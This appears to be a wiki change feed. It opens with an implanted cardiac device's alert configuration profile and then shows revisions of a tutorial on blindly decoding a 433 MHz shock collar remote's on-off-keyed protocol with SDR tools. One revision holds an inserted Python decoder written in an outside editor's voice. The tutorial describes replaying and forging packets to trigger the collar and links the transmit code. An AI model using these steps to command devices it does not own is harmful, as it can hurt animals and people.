<Switch name="DEV_IN_MRI_MODE_ALERT" value="Disable"/><br />
<Switch name="DEV_RST_MRI_MODE_ALERT" value="Disable"/><br />
<Switch name="EARLY_DEPLETION_DETECTED_ALERT" value="Enable"/><br />
<Switch name="PER_BIV_PACING_ALERT" value="Disable"/><br />
<Switch name="PER_RV_PACING_ALERT" value="Enable"/><br />
<Switch name="CONG_MON_NOT" value="Disable"/><br />
<Switch name="DEV_IN_MRI_MODE_NOT" value="Disable"/><br />
<Switch name="DEV_RST_MRI_MODE_NOT" value="Disable"/><br />
<Switch name="EARLY_DEPLETION_DETECTED_NOT" value="Disable"/><br />
<Switch name="PER_BIV_PACING_NOT" value="Disable"/><br />
<Switch name="PER_RV_PACING_NOT" value="Disable"/><br />
<Switch name="LFDA_TIMEOUT_ALERT" value="Enable"/><br />
<Switch name="ST_TYPE_2_ALERT" value="Enable"/><br />
<Switch name="VT_VF_3_PER_DAY_ALERT" value="Enable"/><br />
<Switch name="THERAPY_EXHAUSTED_ALERT" value="Enable"/><br />
<Switch name="HV_THERAPY_UNSUC_ALERT" value="Enable"/><br />
<Switch name="VT_VF_OCCURED_ALERT" value="Enable"/><br />
<Switch name="LFDA_TIMEOUT_NOT" value="Disable"/><br />
<Switch name="ST_TYPE_2_NOT" value="Disable"/><br />
<Switch name="VT_VF_3_PER_DAY_NOT" value="Disable"/><br />
<Switch name="THERAPY_EXHAUSTED_NOT" value="Disable"/><br />
<Switch name="HV_THERAPY_UNSUC_NOT" value="Disable"/><br />
<Switch name="VT_VF_OCCURED_NOT" value="Disable"/><br />
<Switch name="LFDA_NSLN_ALERT" value="Enable"/><br />
<Switch name="LFDA_RV_NOISE_ALERT" value="Enable"/><br />
<Switch name="ST_TYPE_1_ALERT" value="Enable"/><br />
<Switch name="LFDA_NSLN_NOT" value="Disable"/><br />
<Switch name="LFDA_RV_NOISE_NOT" value="Disable"/><br />
<Switch name="ST_TYPE_1_NOT" value="Enable"/><br />
<Switch name="AIMP_OOR_ALERT" value="Disable"/><br />
<Switch name="CCRG_LMT_ALERT" value="Enable"/><br />
<Switch name="DEV_EOS_ALERT" value="Disable"/><br />
<Switch name="DEV_ERI_ALERT" value="Enable"/><br />
<Switch name="DEV_EVVI_ALERT" value="Enable"/><br />
<Switch name="DEV_RST_ALERT" value="Enable"/><br />
<Switch name="HVIMP_OOR_ALERT" value="Enable"/><br />
<Switch name="HW_BVVI_ALERT" value="Enable"/><br />
<Switch name="LVIMP_OOR_ALERT" value="Disable"/><br />
<Switch name="OCD_ALERT" value="Enable"/><br />
<Switch name="SOSD_ALERT" value="Enable"/><br />
<Switch name="RVIMP_OOR_ALERT" value="Enable"/><br />
<Switch name="TTRPY_DIS_ALERT" value="Enable"/><br />
<Switch name="ATAF_DUR_ALERT" value="Disable"/><br />
<Switch name="ATAF_WK_DUR_ALERT" value="Disable"/><br />
<Switch name="ATAF_VRATE_ALERT" value="Disable"/><br />
<Switch name="ATP_RX_SUCCESS_ALERT" value="Enable"/><br />
<Switch name="HV_TRPY_ALERT" value="Enable"/><br />
<Switch name="PERCENT_BIV_THRESHOLD_ALERT" value="Disable"/><br />
<Switch name="PERCENT_RV_THRESHOLD_ALERT" value="Disable"/><br />
<Switch name="ST_MAJOR_EPISODE_ALERT" value="Disable"/><br />
<Switch name="TRPY_ACCEL_ALERT" value="Enable"/><br />
<Switch name="NOISE_REV_ALERT" value="Disable"/><br />
<Switch name="NSVT_EPIS_ALERT" value="Disable"/><br />
<Switch name="NSVF_EPIS_ALERT" value="Disable"/><br />
<Switch name="SPARE_1_ALERT" value="Disable"/><br />
<Switch name="SPARE_2_ALERT" value="Disable"/><br />
<Switch name="SPARE_3_ALERT" value="Disable"/><br />
<Switch name="SPARE_4_ALERT" value="Disable"/><br />
<Switch name="SPARE_5_ALERT" value="Disable"/><br />
<Switch name="AIMP_OOR_NOT" value="Disable"/><br />
<Switch name="CCRG_LMT_NOT" value="Disable"/><br />
<Switch name="DEV_EOS_NOT" value="Disable"/><br />
<Switch name="DEV_ERI_NOT" value="Disable"/><br />
<Switch name="DEV_EVVI_NOT" value="Disable"/><br />
<Switch name="DEV_RST_NOT" value="Disable"/><br />
<Switch name="HVIMP_OOR_NOT" value="Disable"/><br />
<Switch name="HW_BVVI_NOT" value="Disable"/><br />
<Switch name="LVIMP_OOR_NOT" value="Disable"/><br />
<Switch name="OCD_NOT" value="Disable"/><br />
<Switch name="SOSD_NOT" value="Disable"/><br />
<Switch name="RVIMP_OOR_NOT" value="Disable"/><br />
<Switch name="TTRPY_DIS_NOT" value="Disable"/><br />
<Switch name="ATAF_DUR_NOT" value="Disable"/><br />
<Switch name="ATAF_WK_DUR_NOT" value="Disable"/><br />
<Switch name="ATAF_VRATE_NOT" value="Disable"/><br />
<Switch name="ATP_RX_SUCCESS_NOT" value="Disable"/><br />
<Switch name="HV_TRPY_NOT" value="Disable"/><br />
<Switch name="PERCENT_BIV_THRESHOLD_NOT" value="Disable"/><br />
<Switch name="PERCENT_RV_THRESHOLD_NOT" value="Disable"/><br />
<Switch name="ST_MAJOR_EPISODE_NOT" value="Disable"/><br />
<Switch name="TRPY_ACCEL_NOT" value="Disable"/><br />
<Switch name="NOISE_REV_NOT" value="Disable"/><br />
<Switch name="NSVT_EPIS_NOT" value="Disable"/><br />
<Switch name="NSVF_EPIS_NOT" value="Disable"/><br />
<Switch name="SPARE_1_NOT" value="Disable"/><br />
<Switch name="SPARE_2_NOT" value="Disable"/><br />
<Switch name="SPARE_3_NOT" value="Disable"/><br />
<Switch name="SPARE_4_NOT" value="Disable"/><br />
<Switch name="SPARE_5_NOT" value="Disable"/><br />
<iSwitch name="BIV_PACING_DURATION" value="7"/><br />
<iSwitch name="RV_PACING_DURATION" value="7"/><br />
<iSwitch name="ALERT_MASK_DURATION" value="4000"/><br />
<iSwitch name="PERCENT_BIV_PACING" value="100"/><br />
<iSwitch name="PERCENT_RV_PACING" value="100"/><br />
<br />
</Controls><br />
</PayloadProfile><br />
<PayloadProfile Type="GDC"><br />
<GenerateSchedule GS_Interval="1440"/><br />
<UploadSchedule US_Interval="168"/><br />
<Controls><br />
<Switch name="SCHED_GDC_PREF" value="Disable"/><br />
<Switch name="CLEAR_GDC_FLAG" value="Enable"/><br />
</Controls><br />
</PayloadProfile><br />
<PayloadProfile Type="Maintenance"><br />
<UploadSchedule US_Interval="168"/><br />
<Controls><br />
<Switch name="MAINT_REBOOT_PREF" value="Disable"/><br />
<Switch name="MAINT_PREF" value="Enable"/><br />
<Switch name="RF_STAT_COLLECT" value="Disable"/><br />
<Switch name="STAT_DATA_UPLD_PREF" value="Enable"/><br />
</Controls><br />
</PayloadProfile><br />
<PayloadProfile Type="MED"><br />
<GenerateSchedule GS_Interval="24"/><br />
<UploadSchedule US_Interval="7"/><br />
<Controls><br />
<Switch name="SCHED_MED_PREF" value="Enable"/><br />
<Switch name="SCHED_MED_WINDOW_PREF" value="Enable"/><br />
<iSwitch name="ACTIVE_MED_SCHEDULES" value="1"/><br />
<tSwitch name="MED_SCHEDULE_1" value="1100"/><br />
<tSwitch name="MED_SCHEDULE_2" value="0500"/><br />
</Controls><br />
</PayloadProfile><br />
<PayloadProfile Type="Spare"><br />
<GenerateSchedule GS_DateOfEvent="2000-01-01" GS_Interval="0" GS_TimeOfEvent="08:00:00" GS_UnscheduledEvent="Disable" GS_WeeklyEvent="Sunday"/><br />
<UploadSchedule US_DateOfEvent="2000-01-01" US_Interval="0" US_TimeOfEvent="08:00:00" US_UnscheduledEvent="Disable" US_WeeklyEvent="Sunday"/><br />
<Controls><br />
<Switch name="SPARE_FLAG1" value="Disable"/><br />
<Switch name="SPARE_FLAG2" value="Enable"/><br />
<Switch name="SPARE_FLAG3" value="Disable"/><br />
<Switch name="SPARE_FLAG4" value="Disable"/><br />
<Switch name="SPARE_FLAG5" value="Disable"/><br />
<Switch name="SPARE_FLAG6" value="Disable"/><br />
<Switch name="SPARE_FLAG7" value="Disable"/><br />
<Switch name="SPARE_FLAG8" value="Disable"/><br />
<Switch name="SPARE_FLAG9" value="Disable"/><br />
<Switch name="SPARE_FLAG10" value="Disable"/><br />
<iSwitch name="SPARE_INTEGER1" value="0"/><br />
<iSwitch name="SPARE_INTEGER2" value="0"/><br />
<iSwitch name="SPARE_INTEGER3" value="0"/><br />
<iSwitch name="SPARE_INTEGER4" value="0"/><br />
<iSwitch name="SPARE_INTEGER5" value="0"/><br />
<iSwitch name="SPARE_INTEGER6" value="0"/><br />
<iSwitch name="SPARE_INTEGER7" value="0"/><br />
<iSwitch name="SPARE_INTEGER8" value="0"/><br />
<iSwitch name="SPARE_INTEGER9" value="0"/><br />
<iSwitch name="SPARE_INTEGER10" value="0"/><br />
<rSwitch name="SPARE_REAL4" value="0.0"/><br />
<rSwitch name="SPARE_REAL5" value="0.0"/><br />
<rSwitch name="SPARE_REAL6" value="0.0"/><br />
<rSwitch name="SPARE_REAL7" value="0.0"/><br />
<rSwitch name="SPARE_REAL8" value="0.0"/><br />
<rSwitch name="SPARE_REAL9" value="0.0"/><br />
<rSwitch name="SPARE_REAL10" value="0.0"/><br />
<rSwitch name="SPARE_REAL1" value="0.0"/><br />
<rSwitch name="SPARE_REAL2" value="0.0"/><br />
<rSwitch name="SPARE_REAL3" value="0.0"/><br />
<tSwitch name="SPARE_TEXT1" value=" "/><br />
<tSwitch name="SPARE_TEXT2" value=" "/><br />
<tSwitch name="SPARE_TEXT3" value=" "/><br />
<tSwitch name="SPARE_TEXT4" value=" "/><br />
<tSwitch name="SPARE_TEXT5" value=" "/><br />
<tSwitch name="SPARE_TEXT6" value=" "/><br />
<tSwitch name="SPARE_TEXT7" value=" "/><br />
<tSwitch name="SPARE_TEXT8" value=" "/><br />
<tSwitch name="SPARE_TEXT9" value=" "/><br />
<tSwitch name="SPARE_TEXT10" value=" "/><br />
</Controls><br />
</PayloadProfile><br />
</profile:ProfileList></pre></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=Blind_RF_Signal_Analysis&diff=2821Blind RF Signal Analysis2017-08-07T00:50:39Z<p>Rjmendez: Rjmendez moved page Blind RF Signal Analysis to RF Signal Analysis</p>
<hr />
<div>#REDIRECT [[RF Signal Analysis]]</div>Rjmendezhttps://www.Exploitee.rs/index.php?title=RF_Signal_Analysis&diff=2820RF Signal Analysis2017-08-07T00:50:39Z<p>Rjmendez: Rjmendez moved page Blind RF Signal Analysis to RF Signal Analysis</p>
<hr />
<div>This page covers some basic RF signal analysis.<br />
<br />
== About ==<br />
Many IoT devices use sub-1 GHz signaling for various functions (sensors, remote controls, device-to-device communication) with an undocumented and sometimes proprietary protocol. These can be difficult to understand without documentation, and the aim here is to provide some of the first steps needed to identify and decode some of the data. The hardware used in this demo will be:<br />
<br />
* A HackRF from Great Scott Gadgets (https://greatscottgadgets.com/hackrf/)<br />
* An RTL-SDR dongle from the rtl-sdr blog, for sale on Amazon (http://www.rtl-sdr.com/buy-rtl-sdr-dvb-t-dongles/)<br />
* Another device from Great Scott Gadgets, the YARD Stick One (https://greatscottgadgets.com/yardstickone/)<br />
<br />
== Where to look ==<br />
<br />
One good place to start is the FCC documentation for the transmitting device: if the device has an FCC ID, its filings are on record. Some good reference links are below.<br />
<br />
Awesome US spectrum allocation graphic: https://upload.wikimedia.org/wikipedia/commons/d/df/United_States_Frequency_Allocations_Chart_2011_-_The_Radio_Spectrum.pdf<br />
<br />
Wikipedia page on ISM bands: https://en.wikipedia.org/wiki/ISM_band<br />
<br />
Our demo device for now is an alarm remote control with the FCC ID "B4Z-RF400401"; the operating frequency is not listed on the package.<br />
<br />
[[File:Remote.jpg|300px]]<br />
<br />
We can look this ID up on https://fccid.io/ to get some details.<br />
<br />
https://fccid.io/B4Z-RF4004-01-2<br />
<br />
[[File:B4Z-RF400401_fccid.io.PNG|300px]]<br />
<br />
Now we know where this device is supposed to be transmitting and we can move on to the next steps.<br />
<br />
== How to look ==<br />
<br />
Good tools for this are gqrx (Linux and Mac, http://gqrx.dk/) or SDR# (Windows, http://airspy.com/download/), run at a high sample rate so that the whole band the device operates in is visible and the signal can be found. For the rest of the demo I will be using another device, one with no FCC ID; it advertises that it operates at 433 MHz. I will be capturing with the RTL-SDR dongle.<br />
<br />
[[File:Shock_Collar.jpg|300px]]<br />
<br />
{{#ev:youtube|NI8U1IfQyto}}<br />
<br />
I know where to look for the signal now, but the waveform isn't showing me very much. Listening to the demodulated audio does tell me something, however: this sounds like Amplitude Shift Keying (ASK), in its simplest form On-Off Keying (OOK). Let's verify this with GNU Radio and gr-fosphor over the HackRF for a higher quality signal.<br />
<br />
[[File:Inspect_ook_grc.png|500px]]<br />
[[File:Inspect_ook_gr-fosphor.png|500px]]<br />
<br />
This absolutely looks like OOK.<br />
<br />
Useful link to the Signal Identification Guide wiki: http://www.sigidwiki.com/wiki/Signal_Identification_Guide<br />
<br />
== Decoding ==<br />
<br />
Our next task is to determine the data rate; a favorite tool for this is Inspectrum (https://github.com/miek/inspectrum).<br />
<br />
[[File:Inspectrum_ook.png|500px]]<br />
<br />
We can clearly see individual bits here and get a rough idea of the baud rate: it looks like it is above 3500 baud, but we can refine this. Another useful tool is Universal Radio Hacker (https://github.com/sthysel/urh), which takes much of the work out of demodulating and decoding a signal.<br />
<br />
[[File:URH_waveform_demod.png|500px]]<br />
<br />
Knowing the approximate baud rate and our sample rate of 2 million samples per second, we can start adjusting the bit length and noise level in URH to decode the packets. Things start to settle out at 500 samples per bit. That would give a baud rate of 4000; this isn't accurate, because of the other tinkering, but it is enough to decode the signal. More careful adjustment gets us closer to the actual rate of 555 samples per bit, or about 3600 baud. At this point we could retransmit these bits with the HackRF and trigger the device, but that doesn't give us a clear idea of what is actually going on.<br />
<br />
The pattern of bits looks like there is some error correction built in: a sequence of 1000 seems to represent a 0 and 1110 a 1. URH lets us decode this further, as seen below.<br />
<br />
[[File:URH_NRZ_replace.png|500px]]<br />
<br />
The resulting packets now look like this.<br />
<br />
[[File:Decoded_packets.png]]<br />
<br />
If we ignore the noise on 5 and 10, we can see a sequence forming. This sequence is the result of changing the power level setting on the remote control. With more changes and monitoring, the entire protocol can be decoded.<br />
<br />
[[File:Collar_protocol_packet.PNG|500px]]<br />
<br />
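To make the decoding steps above concrete, here is an added example (not code from the original page or from the author's ShockCollar repository) of a small pure-Python OOK decoder that does by hand what the URH steps do: threshold the envelope at a noise level, measure run lengths to estimate the samples per bit, slice the frame into raw bits, and apply the 1000 to 0 and 1110 to 1 replacement. It decodes any bit sequence and any bit length, not just the one on the page. The input is a constructed envelope produced by <code>encode_ook</code>, not a real capture; the 2 Msps sample rate, the 555 samples per bit and the symbol table come from the text, while the noise level, the threshold and all function names are my assumptions. The raw rate of about 3600 baud is the rate of the four-symbol groups, so the data rate after the replacement is a quarter of it.<br />

```python
import random
from typing import List, Tuple

SAMPLE_RATE = 2_000_000     # 2 million samples per second, as in the capture above
SAMPLES_PER_CHIP = 555      # the refined bit length found in URH

# Line code observed on the page: every data bit is sent as four raw OOK
# symbols ("chips" below; these are the bits URH shows before replacement).
SYMBOLS = {"1000": 0, "1110": 1}
CHIPS_PER_BIT = 4


def encode_ook(bits: List[int], samples_per_chip: int = SAMPLES_PER_CHIP,
               noise: float = 0.05, seed: int = 1) -> List[float]:
    """Constructed test signal: data bits -> chips -> noisy OOK envelope.

    Stands in for the magnitude of a real capture; it is not recorded data.
    """
    rng = random.Random(seed)
    chips = "".join("1110" if b else "1000" for b in bits)
    env: List[float] = []
    for c in chips:
        level = 1.0 if c == "1" else 0.0
        env.extend(level + rng.gauss(0.0, noise) for _ in range(samples_per_chip))
    # silence on both sides, so the decoder has to find the frame itself
    silence = [rng.gauss(0.0, noise) for _ in range(3 * samples_per_chip)]
    return silence + env + silence


def run_lengths(env: List[float], threshold: float) -> List[Tuple[bool, int]]:
    """Slice the envelope at the noise threshold into (is_high, length) runs."""
    runs: List[Tuple[bool, int]] = []
    current = env[0] > threshold
    length = 0
    for sample in env:
        hi = sample > threshold
        if hi == current:
            length += 1
        else:
            runs.append((current, length))
            current, length = hi, 1
    runs.append((current, length))
    return runs


def estimate_samples_per_chip(frame_runs: List[Tuple[bool, int]]) -> int:
    """The shortest run inside the frame is one chip; all runs are multiples.

    Any frame of two or more bits in this code contains a one-chip run.
    """
    return min(n for _, n in frame_runs)


def decode_ook(env: List[float], threshold: float = 0.5) -> Tuple[List[int], int]:
    """Return (data bits, samples per chip) for a single OOK frame."""
    runs = run_lengths(env, threshold)
    highs = [i for i, (hi, _) in enumerate(runs) if hi]
    if not highs:
        raise ValueError("no signal above threshold")
    frame = runs[highs[0]:highs[-1] + 1]       # drop leading/trailing silence
    spc = estimate_samples_per_chip(frame)
    chips = ""
    for hi, n in frame:
        chips += ("1" if hi else "0") * round(n / spc)
    # both symbols end in 0, so the frame's trailing zeros merge into the
    # silence after it; pad back up to a whole number of symbols
    chips += "0" * (-len(chips) % CHIPS_PER_BIT)
    bits: List[int] = []
    for i in range(0, len(chips), CHIPS_PER_BIT):
        group = chips[i:i + CHIPS_PER_BIT]
        if group not in SYMBOLS:
            raise ValueError(f"unknown symbol {group!r} at chip {i}: "
                             "noise or wrong threshold")
        bits.append(SYMBOLS[group])
    return bits, spc


def raw_baud(samples_per_chip: int) -> float:
    """Raw symbol rate; this is the figure the page calls the baud rate."""
    return SAMPLE_RATE / samples_per_chip


if __name__ == "__main__":
    payload = [1, 0, 1, 1, 0, 0, 1, 0]
    decoded, spc = decode_ook(encode_ook(payload))
    print(decoded, spc, round(raw_baud(spc)), raw_baud(spc) / CHIPS_PER_BIT)
```

A wrong threshold or a burst of noise shows up as an unknown four-chip group, which is the same symptom as the noisy rows in the URH output; the decoder raises on it rather than guessing.<br />
<br />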
== Sending our own data ==<br />
<br />
With this data we can now use a tool like the YARD Stick One to transmit our own packets to the device. I have posted the complete code here: https://github.com/rjmendez/ShockCollar</div>Rjmendezhttps://www.Exploitee.rs/index.php?title=RF_Signal_Analysis&diff=2819RF Signal Analysis2017-08-07T00:50:26Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=RF_Signal_Analysis&diff=2818RF Signal Analysis2017-08-07T00:30:23Z<p>Rjmendez: </p>
<hr />
<div>This page will be to cover some basic blind RF signal analysis.<br />
<br />
== About ==<br />
Many IoT devices use < 1Ghz signaling for various functions (various sensors, remote controls, device to device communication) with an undocumented and sometimes proprietary protocol. It can often be difficult to understand these without documentation and the aim here is to provide some of the first steps needed to identify and decode some of the data. The hardware used in this demo will be:<br />
<br />
A HackRF from Great Scott Gadgets. (https://greatscottgadgets.com/hackrf/)<br />
<br />
An RTL-SDR dongle from the rtl-sdr blog that is for sale on amazon. (http://www.rtl-sdr.com/buy-rtl-sdr-dvb-t-dongles/)<br />
<br />
Another device from Great Scott Gadgets, the YARD Stick One. (https://greatscottgadgets.com/yardstickone/)<br />
<br />
== Where to look ==<br />
<br />
One great place to start is with the FCC documentation for the transmitting device, if the device has an fccid then it will have information on file. Some good reference links are below.<br />
<br />
Awesome US spectrum allocation graphic: https://upload.wikimedia.org/wikipedia/commons/d/df/United_States_Frequency_Allocations_Chart_2011_-_The_Radio_Spectrum.pdf<br />
<br />
Wikipedia page on ISM bands: https://en.wikipedia.org/wiki/ISM_band<br />
<br />
Our demo device right now will be an alarm remote control with the fccid "B4Z-RF400401" that does not have the frequency listed on the package.<br />
<br />
[[File:Remote.jpg|300px]]<br />
<br />
We can throw this ID into the https://fccid.io/ site to get some details.<br />
<br />
https://fccid.io/B4Z-RF4004-01-2<br />
<br />
[[File:B4Z-RF400401_fccid.io.PNG|300px]]<br />
<br />
Now we know where this device is supposed to be transmitting and we can move on to the next steps.<br />
<br />
== How to look ==<br />
<br />
Some favorites are gqrx (linux and mac http://gqrx.dk/) or sdr# (windows http://airspy.com/download/ ) in a higher sample rate mode to inspect the entire band the device operates on to look for the signal. For the rest of the demo I will be using another device with no FCC id. It advertises that it operates at 433mhz. I will be capturing with the RTL-SDR dongle.<br />
<br />
[[File:Shock_Collar.jpg|300px]]<br />
<br />
{{#ev:youtube|NI8U1IfQyto}}<br />
<br />
I know where to look for the signal now but the wave form isn't showing me very much. Listening to the demodulated audio does tell me something however, this sounds like Amplitude Shift Keying (ASK) also known as On Off Keying (OOK). Lets verify this with gnuradio and gr-fosphor over the hackrf for a bit higher quality signal.<br />
<br />
[[File:Inspect_ook_grc.png|500px]]<br />
[[File:Inspect_ook_gr-fosphor.png|500px]]<br />
<br />
This absolutely looks like OOK.<br />
<br />
Useful link to the Signal Identification Guide wiki: http://www.sigidwiki.com/wiki/Signal_Identification_Guide<br />
<br />
== Decoding ==<br />
<br />
Our next task will be to determine the data rate, a favorite tool is Inspectrum (https://github.com/miek/inspectrum).<br />
<br />
[[File:Inspectrum_ook.png|500px]]<br />
<br />
We can see the definite bits here and get a general idea about the baud rate, it looks like it is above 3500 baud but we can refine this! Another useful tool is Universal Radio Hacker (https://github.com/sthysel/urh) that can take a bunch of the work out of demodulating and decoding a signal.<br />
<br />
[[File:URH_waveform_demod.png|500px]]<br />
<br />
Knowing the approximate baud rate and our sample rate of 2 million samples per second we can start to fiddle with the bit length and noise level to decode the packets. Things start to settle out at 500 samples per bit. This would give us a baud rate of 4000, this isn't accurate because of the rest of the tinkering but it will let us decode the signal. More careful adjustment will get us closer to the actual rate of 555 samples per second or 3600 baud. At this point we can retransmit these bits with the hackrf and trigger the device but it doesn't give us a clear of an idea what is actually going on.<br />
<br />
The pattern of bits look like there is some error correction built in, a sequence of 1000 seems to equal 0 and 1110 equals a 1. URH will let us decode this further as seen below.<br />
<br />
[[File:URH_NRZ_replace.png|500px]]<br />
<br />
The resulting packets now look like this.<br />
<br />
[[File:Decoded_packets.png]]<br />
<br />
If we ignore the noise in rows 5 and 10, we can see a sequence forming. This sequence is the result of changing the power level setting on the remote control. With more changes and monitoring, the entire protocol can be decoded.<br />
<br />
[[File:Collar_protocol_packet.PNG|500px]]<br />
<br />
== Sending our own data ==<br />
<br />
With this data we can now use a tool like the YARD Stick One to transmit our own packets to the device. I have posted the complete code here: https://github.com/rjmendez/ShockCollar</div>Rjmendezhttps://www.Exploitee.rs/index.php?title=User:Rjmendez&diff=2817User:Rjmendez2017-08-06T22:23:07Z<p>Rjmendez: Rjmendez moved page User:Rjmendez to Blind RF Signal Analysis</p>
<hr />
<div>#REDIRECT [[Blind RF Signal Analysis]]</div>Rjmendezhttps://www.Exploitee.rs/index.php?title=RF_Signal_Analysis&diff=2816RF Signal Analysis2017-08-06T22:23:07Z<p>Rjmendez: Rjmendez moved page User:Rjmendez to Blind RF Signal Analysis</p>
<hr />
<div>This page will cover some basic blind RF signal analysis.<br />
<br />
== About ==<br />
Many IoT devices use sub-1 GHz signaling for various functions (sensors, remote controls, device-to-device communication) with an undocumented and sometimes proprietary protocol. It can often be difficult to understand these without documentation; the aim here is to provide some of the first steps needed to identify and decode some of the data. The hardware used in this demo will be:<br />
<br />
A HackRF from Great Scott Gadgets. (https://greatscottgadgets.com/hackrf/)<br />
<br />
An RTL-SDR dongle from the RTL-SDR blog that is for sale on Amazon. (http://www.rtl-sdr.com/buy-rtl-sdr-dvb-t-dongles/)<br />
<br />
Another device from Great Scott Gadgets, the YARD Stick One. (https://greatscottgadgets.com/yardstickone/)<br />
<br />
== Where to look ==<br />
<br />
One great place to start is the FCC documentation for the transmitting device; if the device has an FCC ID, then it will have information on file. Some good reference links are below.<br />
<br />
Awesome US spectrum allocation graphic: https://upload.wikimedia.org/wikipedia/commons/d/df/United_States_Frequency_Allocations_Chart_2011_-_The_Radio_Spectrum.pdf<br />
<br />
Wikipedia page on ISM bands: https://en.wikipedia.org/wiki/ISM_band<br />
<br />
Our demo device for now will be an alarm remote control with the FCC ID "B4Z-RF400401" that does not have the frequency listed on the package.<br />
<br />
[[File:Remote.jpg|300px]]<br />
<br />
We can throw this ID into the https://fccid.io/ site to get some details.<br />
<br />
https://fccid.io/B4Z-RF4004-01-2<br />
<br />
[[File:B4Z-RF400401_fccid.io.PNG|300px]]<br />
<br />
Now we know where this device is supposed to be transmitting and we can move on to the next steps.<br />
<br />
== How to look ==<br />
<br />
Some favorites are gqrx (Linux and Mac, http://gqrx.dk/) or SDR# (Windows, http://airspy.com/download/), run in a higher sample rate mode to inspect the entire band the device operates on and look for the signal. For the rest of the demo I will be using another device with no FCC ID. It advertises that it operates at 433 MHz. I will be capturing with the RTL-SDR dongle.<br />
<br />
[[File:Shock_Collar.jpg|300px]]<br />
<br />
{{#ev:youtube|NI8U1IfQyto}}<br />
<br />
I know where to look for the signal now, but the waveform isn't showing me very much. Listening to the demodulated audio does tell me something, however: this sounds like Amplitude Shift Keying (ASK), in its simplest form also known as On-Off Keying (OOK). Let's verify this with GNU Radio and gr-fosphor over the HackRF for a somewhat higher quality signal.<br />
<br />
[[File:Inspect_ook_grc.png]]<br />
[[File:Inspect_ook_gr-fosphor.png]]<br />
<br />
This absolutely looks like OOK.<br />
<br />
Useful link to the Signal Identification Guide wiki: http://www.sigidwiki.com/wiki/Signal_Identification_Guide<br />
<br />
== Decoding ==<br />
<br />
Our next task will be to determine the data rate; a favorite tool for this is Inspectrum (https://github.com/miek/inspectrum).<br />
<br />
[[File:Inspectrum_ook.png]]<br />
<br />
We can see the definite bits here and get a general idea about the baud rate: it looks like it is above 3500 baud, but we can refine this! Another useful tool is Universal Radio Hacker (https://github.com/sthysel/urh), which takes a lot of the work out of demodulating and decoding a signal.<br />
<br />
[[File:URH_waveform_demod.png]]<br />
<br />
Knowing the approximate baud rate and our sample rate of 2 million samples per second, we can start to fiddle with the bit length and noise level to decode the packets. Things start to settle out at 500 samples per bit. That would give a baud rate of 4000 (2,000,000 / 500); it isn't accurate because of the rest of the tinkering, but it will let us decode the signal. More careful adjustment gets us closer to the actual rate of 555 samples per bit, or about 3600 baud. At this point we can retransmit these bits with the HackRF and trigger the device, but it doesn't give us a clear idea of what is actually going on.<br />
<br />
The bit pattern looks like it has some redundancy built in: a sequence of 1000 seems to represent a 0 and 1110 a 1. URH will let us decode this further, as seen below.<br />
<br />
[[File:URH_NRZ_replace.png]]<br />
<br />
The resulting packets now look like this.<br />
<br />
[[File:Decoded_packets.png]]<br />
<br />
If we ignore the noise in rows 5 and 10, we can see a sequence forming. This sequence is the result of changing the power level setting on the remote control. With more changes and monitoring, the entire protocol can be decoded.<br />
<br />
[[File:Collar_protocol_packet.PNG]]<br />
<br />
== Sending our own data ==<br />
<br />
With this data we can now use a tool like the YARD Stick One to transmit our own packets to the device. I have posted the complete code here: https://github.com/rjmendez/ShockCollar</div>Rjmendezhttps://www.Exploitee.rs/index.php?title=RF_Signal_Analysis&diff=2815RF Signal Analysis2017-08-06T22:21:42Z<p>Rjmendez: Created page with "This page will be to cover some basic blind RF signal analysis. == About == Many IoT devices use < 1Ghz signaling for various functions (various sensors, remote controls, dev..."</p>
<hr />
<div>This page will cover some basic blind RF signal analysis.<br />
<br />
== About ==<br />
Many IoT devices use sub-1 GHz signaling for various functions (sensors, remote controls, device-to-device communication) with an undocumented and sometimes proprietary protocol. It can often be difficult to understand these without documentation; the aim here is to provide some of the first steps needed to identify and decode some of the data. The hardware used in this demo will be:<br />
<br />
A HackRF from Great Scott Gadgets. (https://greatscottgadgets.com/hackrf/)<br />
<br />
An RTL-SDR dongle from the RTL-SDR blog that is for sale on Amazon. (http://www.rtl-sdr.com/buy-rtl-sdr-dvb-t-dongles/)<br />
<br />
Another device from Great Scott Gadgets, the YARD Stick One. (https://greatscottgadgets.com/yardstickone/)<br />
<br />
== Where to look ==<br />
<br />
One great place to start is the FCC documentation for the transmitting device; if the device has an FCC ID, then it will have information on file. Some good reference links are below.<br />
<br />
Awesome US spectrum allocation graphic: https://upload.wikimedia.org/wikipedia/commons/d/df/United_States_Frequency_Allocations_Chart_2011_-_The_Radio_Spectrum.pdf<br />
<br />
Wikipedia page on ISM bands: https://en.wikipedia.org/wiki/ISM_band<br />
<br />
Our demo device for now will be an alarm remote control with the FCC ID "B4Z-RF400401" that does not have the frequency listed on the package.<br />
<br />
[[File:Remote.jpg|300px]]<br />
<br />
We can throw this ID into the https://fccid.io/ site to get some details.<br />
<br />
https://fccid.io/B4Z-RF4004-01-2<br />
<br />
[[File:B4Z-RF400401_fccid.io.PNG|300px]]<br />
<br />
Now we know where this device is supposed to be transmitting and we can move on to the next steps.<br />
<br />
== How to look ==<br />
<br />
Some favorites are gqrx (Linux and Mac, http://gqrx.dk/) or SDR# (Windows, http://airspy.com/download/), run in a higher sample rate mode to inspect the entire band the device operates on and look for the signal. For the rest of the demo I will be using another device with no FCC ID. It advertises that it operates at 433 MHz. I will be capturing with the RTL-SDR dongle.<br />
<br />
[[File:Shock_Collar.jpg|300px]]<br />
<br />
{{#ev:youtube|NI8U1IfQyto}}<br />
<br />
I know where to look for the signal now, but the waveform isn't showing me very much. Listening to the demodulated audio does tell me something, however: this sounds like Amplitude Shift Keying (ASK), in its simplest form also known as On-Off Keying (OOK). Let's verify this with GNU Radio and gr-fosphor over the HackRF for a somewhat higher quality signal.<br />
<br />
[[File:Inspect_ook_grc.png]]<br />
[[File:Inspect_ook_gr-fosphor.png]]<br />
<br />
This absolutely looks like OOK.<br />
<br />
Useful link to the Signal Identification Guide wiki: http://www.sigidwiki.com/wiki/Signal_Identification_Guide<br />
<br />
== Decoding ==<br />
<br />
Our next task will be to determine the data rate; a favorite tool for this is Inspectrum (https://github.com/miek/inspectrum).<br />
<br />
[[File:Inspectrum_ook.png]]<br />
<br />
We can see the definite bits here and get a general idea about the baud rate: it looks like it is above 3500 baud, but we can refine this! Another useful tool is Universal Radio Hacker (https://github.com/sthysel/urh), which takes a lot of the work out of demodulating and decoding a signal.<br />
